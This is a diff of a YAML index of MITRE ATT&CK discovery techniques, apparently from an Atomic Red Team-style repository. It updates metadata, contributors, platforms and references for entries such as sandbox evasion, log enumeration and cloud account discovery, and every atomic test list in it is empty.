-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -49976,6 +50635,10 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -49986,8 +50649,14 @@ discovery:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -49997,9 +50666,28 @@ discovery:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1619:
     technique:
@@ -50032,7 +50720,7 @@ discovery:
         Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage.  Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
 
         Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-11T22:29:43.677Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Cloud Storage Object Discovery
       x_mitre_detection: "System and network discovery techniques normally occur throughout
@@ -50050,12 +50738,11 @@ discovery:
       - 'Cloud Storage: Cloud Storage Enumeration'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1619
     atomic_tests: []
   T1654:
     technique:
-      modified: '2023-09-30T22:18:46.711Z'
+      modified: '2024-10-15T12:24:40.892Z'
       name: Log Enumeration
       description: |-
         Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -50063,11 +50750,14 @@ discovery:
         Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
 
         Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+        In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
       x_mitre_contributors:
       - Bilal Bahadır Yenici
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -50078,7 +50768,7 @@ discovery:
       - macOS
       - Windows
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -50092,6 +50782,10 @@ discovery:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1654
         external_id: T1654
+      - source_name: Permiso GUI-Vil 2023
+        description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+          Cloud Threat Actor. Retrieved August 30, 2024.'
+        url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
       - source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
         description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
           of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
@@ -50111,56 +50805,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1654
     atomic_tests: []
   T1087.004:
     technique:
-      x_mitre_platforms:
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
-      type: attack-pattern
-      created: '2020-02-21T21:08:36.570Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.004
-        url: https://attack.mitre.org/techniques/T1087/004
-      - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
-        source_name: Microsoft msolrolemember
-      - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
-          6, 2019.
-        url: https://github.com/True-Demon/raindance
-        source_name: GitHub Raindance
-      - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
-        source_name: Microsoft AZ CLI
-      - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
-          Directory Leaks via Azure. Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
-        source_name: Black Hills Red Teaming MS AD Azure, 2018
-      - source_name: AWS List Roles
-        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
-      - source_name: AWS List Users
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
-        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
-      - source_name: Google Cloud - IAM Servie Accounts List API
-        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
-        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
-          August 4, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:51:18.808Z'
       name: Cloud Account
       description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
         accounts are those created and configured by an organization for use by users,
@@ -50182,19 +50831,61 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
 
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      - IaaS
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+      created: '2020-02-21T21:08:36.570Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1087/004
+        external_id: T1087.004
+      - source_name: AWS List Roles
+        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+      - source_name: AWS List Users
+        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+      - source_name: Black Hills Red Teaming MS AD Azure, 2018
+        description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
+          Directory Leaks via Azure. Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+      - source_name: Google Cloud - IAM Servie Accounts List API
+        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+          August 4, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+      - source_name: Microsoft AZ CLI
+        description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+      - source_name: Microsoft msolrolemember
+        description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+      - source_name: GitHub Raindance
+        description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+          6, 2019.
+        url: https://github.com/True-Demon/raindance
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1057:
     technique:
@@ -50265,46 +50956,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1057
     atomic_tests: []
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -50328,6 +50984,9 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
         the environment. Data and events should not be viewed in isolation, but as
@@ -50338,9 +50997,14 @@ discovery:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -50350,12 +51014,39 @@ discovery:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1069.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:14:42.184Z'
       name: 'Permission Groups Discovery: Local Groups'
       description: |-
         Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
@@ -50398,12 +51089,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.001
     atomic_tests: []
   T1201:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:02:44.477Z'
       name: Password Policy Discovery
       description: |-
         Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
@@ -50414,28 +51104,31 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Regina Elwell
+      - Sudhanshu Chauhan, @Sudhanshu_C
+      - Isif Ibrahima, Mandiant
+      - Austin Clark, @c2defense
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor logs and processes for tools and command line arguments
         that may indicate they're being used for password policy discovery. Correlate
         that activity with other suspicious activity from the originating system to
         reduce potential false positives from valid user or administrator activity.
         Adversaries will likely attempt to find the password policy early in an operation
         and the activity is likely to happen with other Discovery activity.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - IaaS
       - Network
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.5'
-      x_mitre_contributors:
-      - Regina Elwell
-      - Sudhanshu Chauhan, @Sudhanshu_C
-      - Isif Ibrahima, Mandiant
-      - Austin Clark, @c2defense
+      - Identity Provider
+      - SaaS
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Metadata'
       - 'Command: Command Execution'
@@ -50468,9 +51161,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1201
     atomic_tests: []
   T1614.001:
@@ -50513,7 +51205,7 @@ discovery:
         description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
           the Doppelgänging technique. Retrieved May 22, 2018.
         url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:00:56.174Z'
       name: 'System Location Discovery: System Language Discovery'
       description: "Adversaries may attempt to gather information about the system
         language of a victim in order to infer the geographical location of that host.
@@ -50552,13 +51244,11 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614.001
     atomic_tests: []
   T1012:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:56:37.011Z'
       name: Query Registry
       description: |-
         Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
@@ -50599,87 +51289,85 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1012
     atomic_tests: []
   T1614:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:07:23.511Z'
+      name: System Location Discovery
+      description: |2-
+
+        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Pooja Natarajan, NEC Corporation India
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Wes Hurd
       - Katie Nickels, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
+
+        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      - IaaS
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Process: OS API Execution'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
       created: '2021-04-01T16:42:08.735Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1614
         url: https://attack.mitre.org/techniques/T1614
-      - source_name: FBI Ragnar Locker 2020
-        url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
-        description: FBI. (2020, November 19). Indicators of Compromise Associated
-          with Ragnar Locker Ransomware. Retrieved April 1, 2021.
-      - source_name: Sophos Geolocation 2016
-        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
-        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
-          target you based on where you live. Retrieved April 1, 2021.'
+        external_id: T1614
       - source_name: Bleepingcomputer RAT malware 2020
-        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
         description: Abrams, L. (2020, October 23). New RAT malware gets commands
           via Discord, has ransomware feature. Retrieved April 1, 2021.
+        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
       - source_name: AWS Instance Identity Documents
-        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
         description: Amazon. (n.d.). Instance identity documents. Retrieved April
           2, 2021.
-      - source_name: Microsoft Azure Instance Metadata 2021
-        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
-        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
-          (Windows). Retrieved April 2, 2021.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
       - source_name: Securelist Trasparent Tribe 2020
-        url: https://securelist.com/transparent-tribe-part-1/98127/
         description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
           part 1. Retrieved April 1, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
-      name: System Location Discovery
-      description: |2-
-
-        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
-        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
-        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_detection: |-
-        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
-        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
-
-        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
-      x_mitre_version: '1.0'
+        url: https://securelist.com/transparent-tribe-part-1/98127/
+      - source_name: FBI Ragnar Locker 2020
+        description: FBI. (2020, November 19). Indicators of Compromise Associated
+          with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+        url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+      - source_name: Microsoft Azure Instance Metadata 2021
+        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+          (Windows). Retrieved April 2, 2021.
+        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+      - source_name: Sophos Geolocation 2016
+        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+          target you based on where you live. Retrieved April 1, 2021.'
+        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Process: OS API Execution'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614
     atomic_tests: []
   T1518.001:
@@ -50732,17 +51420,16 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518.001
     atomic_tests: []
   T1526:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Cloud Service Discovery
       description: |-
-        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
